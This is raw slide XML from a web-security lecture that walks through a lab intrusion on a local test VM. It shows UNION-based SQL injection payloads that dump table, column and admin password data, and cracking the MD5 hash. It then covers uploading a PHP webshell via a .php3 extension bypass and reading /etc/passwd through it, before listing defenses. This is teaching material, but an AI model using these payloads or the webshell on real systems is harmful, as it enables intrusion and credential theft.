            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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We'll get LOTS of results but the breakdown is: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Target is running </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="1800" lang="en"/>
              <a:t>Apache/2.2.16</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t> on Debian (So its hosting a website)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target is running </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="1800" lang="en"/>
              <a:t>PHP/5.3.3-7+squeeze13</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>,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has active filtering on URLs, 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site has the following directories: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br>
              <a:rPr sz="1800" lang="en"/>
            </a:br>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="549" name="Shape 549"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off y="40530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{75BB7E15-31E7-4080-A25C-3AFF7D07E15D}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/admin/index.php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/all/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/cat/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/classes/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/css/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/footer/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/header/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/icons/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/images/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/index/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr rtl="0" lvl="0" indent="0" marL="45720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/show/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Vulnerability Analysis time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y="1417637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enter the target ip in a web browser (I'm using firefox + burpsuite, as always) and visit those URLs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95087" x="626682"/>
            <a:ext cy="4282237" cx="762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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3983525" x="5867900"/>
            <a:ext cy="990299" cx="27851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We've used BurpSuite before, so that wont be covered this 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GET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GET Method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passes all request data in the URL query string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GET /blog.php?user=bob&amp;type=1 HTTP/1.1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User-Agent:Mozilla/4.0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Host: www.exampleblog.com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....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Manually detecting web vulnerabilities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 fuzz the actual HTTP requests with the proxy (burspsuite / web scarab).   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" i="1"/>
              <a:t>Fuzz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>things like the login page, etc...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Can also detect sql injection.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goto http://192.168.43.130/cat.php?id=1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and try adding </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> onto the end of the URL.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Manually detecting SQLi vuln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http://192.168.43.130/cat.php?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'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This will escape the prepared sql statement, breaking the syntax, and resuling in a SQL error.  This tells us that it is running SQL, and has a SQLi vuln. There many ways to do this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You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 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is an example of </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error-Based SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr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pfffft... I don't have time for that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y="1540229" x="457200"/>
            <a:ext cy="5027699" cx="391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Fine, lets go back to </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en"/>
              <a:t>w3af </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>and automatically detect vulnerabilities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4025" x="4381500"/>
            <a:ext cy="513397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Vuln scanning with w3af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w3af/plugins&gt;&gt;&gt; audit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(Gives us a list of audit tools)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we'll use:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>w3af/plugins&gt;&gt;&gt;audit blindSqli sqli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we need to change the target b4 we begin, to give it some of the URLs we discovered.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w3af setup again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 back twice and goto target and give it a few URLs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w3af/config:target&gt;&gt;&gt;set target 192.168.43.130,http://192.168.43.130/,http://192.168.43.130/cat.php?id=1,http://192.168.43.130/admin/login.php,http://192.168.43.130/all.php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/>
              <a:t>so, the cat.php, admin/login.php, and all.php pages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Interesting Results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Found 6 URLs and 6 different points of injection.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The list of fuzzable requests is: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</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="1400" lang="en"/>
              <a:t>http://192.168.43.130/admin/index.php | Method: POST | Parameters: (user="", password="")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http://192.168.43.130/admin/login.php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http://192.168.43.130/all.php | Method: GET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- http://192.168.43.130/cat.php | Method: GET | Parameters: (id="1")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u="sng" b="1" sz="1400" lang="en"/>
              <a:t>Blind SQL injection was found at: "http://192.168.43.130/cat.php", using HTTP method GET. The injectable parameter is: "id". This vulnerability was found in the requests with ids 250 to 251.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 SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "MySQL server version for the right syntax to use". The error was found on response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 SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "You have an error in your SQL syntax;". The error was found on response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SQL injection in a MySQL database was found at: "http://192.168.43.130/cat.php", using HTTP method GET. The sent data was:</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="1400" lang="en"/>
              <a:t> "id=d%27z%220"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>. This vulnerability was found in the request with id 261.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Scan finished in 7 seconds.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Well..</a:t>
            </a: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 seems that only that ONE page (cat.php) has a vulnerability with the id parameter.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rest of the results aren't SQLi related, and we've covered those topics before.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so lets exploit this single vulnerability (SQLi time)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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>=1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is SQLi vulnerable, but we don't know what the SQL query behind it in the cat.php code looks like.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lets find out how many columns it is requesting.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Union-Based SQLi for beginners</a:t>
            </a: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FUN FACT:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>All queries in a SQL statement containing UNION operator must have an equal number of expressions in their target lists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i.e.....  A UNION B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must have the same # of columns.  But we can use this to enumerate the columns of a statement.....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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF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UNION SELECT ALL 1--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rgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"The UNION SELECT ALL ...." part is a common SQLi trick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y="2199125" x="5947650"/>
            <a:ext cy="403499" cx="2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This is integer based, so no tick required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POST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POST Method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passes all request data in the HTTP request body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POST /blog.php HTTP/1.1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User-Agent:Mozilla/4.0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Host: www.exampleblog.com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Content-Length:15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....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user=bob&amp;type=1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1,2,3,4--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Success! we get a valid, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>populated</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> webpage back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this prepared statement has 4 columns.  This technique works when SQL error messages are disabled (and Error-Based SQLi does not work).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i="1"/>
              <a:t>toying around with these params will reveal what does what.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OK its 4 columns, lets try unioning with other tables.... but we need to find the tables and other info.... like:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>database(), user(), @@version,@@datadir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32" name="Shape 632"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off y="3626550" x="6874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{A7989DB9-B474-450D-B605-22F0AB1791C6}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database(),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photoblog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user(),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pentesterlab@localhost</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marR="91425" marB="91425" marT="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="5649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@@version,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/>
                        <a:t>reveals db version == 5.1.63-0+squeeze1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@@datadir, 2, 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the DB is stored in /var/lib/mysql/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get the table names</a:t>
            </a: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Most SQL Databases have a table in each database called "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>", which is always interesting.  We can grab all table names and column names from it. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>Once you know the DB type and version, this info is easy to determine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 can use the following SQLi to extract this info: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... UNION SELECT 1, table_name, 3, 4 from information_schema.columns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there's a user's table, lets get some column names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 can use this same technique to get all the column names across the DB.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 UNION SELECT 1, column_name, 3, 4 from information_schema.columns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the following interesting column names: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id, privileges, user, host, db, command, login password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Excellent, lets break in to the admin console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...UNION SELECT 1, login, 3, 4 from users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a login of "admin"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 UNION SELECT 1, password, 3, 4 from users</a:t>
            </a:r>
          </a:p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reveals a password hash of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8efe310f9ab3efeae8d410a8e0166eb2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which after cracking reveals the password is:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>P4ssw0rd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 used http://www.md5decrypter.co.uk/ and it took seconds.  </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en"/>
              <a:t>moral of the story: MD5 is dead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y="274637" x="457200"/>
            <a:ext cy="1143000" cx="388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We can't stop here...</a:t>
            </a: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its sh3ll country :)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That was just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the admin console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for that stupid website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5692" x="4300962"/>
            <a:ext cy="6955668" cx="491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can upload a file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Hmm what could go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wrong?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733925"/>
            <a:ext cy="2800350" cx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Uploading a webshell and Code Execution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&lt;? php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system($_GET['cmd'])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?&gt;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This code when put into ANY webpage can be a small webshell.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code will take the content of the parameter cmd and executes it... i.e.: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192.168.1.130/admin/uploads/shell.php?cmd=ls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webshell code</a:t>
            </a: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&lt;?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( strcmp( $_GET['cmd'], "" ) == 0 ){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echo "15825b40c6dace2a" . "7cf5d4ab8ed434d5";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}else{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system ( $_GET['cmd'] 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?&gt;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This bypasses T_String parse error.  Found in w3af attack payloads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shell notes</a:t>
            </a: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command you run is run in a brand new context, independent of previous commands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webshell has the same privileges as the web server running the php script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ways to filter out uploaded php,python, etc files... but there also ways around those filters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you can easily </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" i="1"/>
              <a:t>trojanize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>any open source webapps (i.e. drupal, wordpress, etc..) by adding webshell code to them and overriding the target file on the webserver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Status Breakdown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responses include status code, and label/reason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1XX: Informational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2XX: Success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3XX: Redirection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4XX: Client Error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5XX: Server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Fail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 seems to filter out the php file somehow. And spews back this:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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"NO PHP!!"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689" name="Shape 6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43675" x="3924300"/>
            <a:ext cy="332422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y="1600200" x="457200"/>
            <a:ext cy="4967700" cx="137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uploading a .jpg gives us the following.  Pay attention to the content type at the bottom...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Here</a:t>
            </a:r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1866900"/>
            <a:ext cy="5143500" cx="72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7" name="Shape 697"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5426425" x="968400"/>
            <a:ext cy="357299" cx="84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1600200" x="457200"/>
            <a:ext cy="4967700" cx="1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The webshell is interpreted as "application/octet-stream" content.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Lets change that to "image/jpeg" and see what happens to the filter.</a:t>
            </a:r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1750" x="1838325"/>
            <a:ext cy="4838700" cx="7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Still fail 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Must be filtering by something else,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try renaming it to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shell.jpg.php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shell.png.php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Maybe old verions (see RFC)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shell.php3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.php3 is a still recognized artifact filetype from the late 90's when php was young.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="711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3973" x="5690798"/>
            <a:ext cy="2201375" cx="3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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="717" name="Shape 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31487" x="5504776"/>
            <a:ext cy="2726512" cx="36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http://192.168.43.130/admin/uploads/webshell.php3?cmd=</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en"/>
              <a:t>whoami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reveals it is being run under account "www-data"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 try: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>http....</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>/admin/uploads/webshell.php3?cmd=</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en" i="1"/>
              <a:t>cat /etc/passwd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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GAME OVER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injection vectors</a:t>
            </a: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LDAP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XPATH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XML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XSLT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OS commands (system("...."))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logs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 interpreter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Defending against Injection attacks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https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet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 basic defenses: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</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" lang="en"/>
              <a:t>parameterized queries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Not vulnerable to injection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not always an option!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stored procedures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does not dynamically build the SQL statements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Encoding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php </a:t>
            </a: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parameterized statements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mysql_real_escape_string()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escapes special characters in a string SQL statement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prepared statements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http://us2.php.net/pdo.prepared-statements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SQLi injection cheat sheet</a:t>
            </a:r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2400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet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Jason Pubal "SQL Injection" derbycon presentation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http://intellavis.com/blog/?p=498</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="1100" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://dl.dropbox.com/u/14820738/SQLi.pdf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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="1100" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Main_Page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www.pentesterlab.com </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="1100" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.pentesterlab.com/from_sqli_to_shell.html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SQLNINJA </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://sqlninja.sourceforge.net/sqlninja-howto.html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Status Codes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responses include status code, and label/reason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200 OK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302 Location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resource redirection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401 Unauthorized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client not authorized for resource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403 Forbidden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even with valid credentials, access is forbidden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usually file system permissions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404 Not Found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500 Internal Server Error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request caused an error on the server (interesting)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resources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Joe McCray has a pretty great DEFCON presentation on advanced SQLi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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http://www.youtube.com/watch?v=rdyQoUNeXSg&amp;feature=relmfu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1" name="Shape 7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858001" cx="91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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="412600" x="1625375"/>
            <a:ext cy="1095000" cx="587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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questions???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Maintaining State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HTTP is stateless, does not track any state between requests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 maintain state, application designer must implement a state tracking mechanism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Session identifier (Session ID) is typically passed within a request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to associate requests within a session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Session ID are typically implemented in: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URL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Hidden form fields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000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie HTTP Header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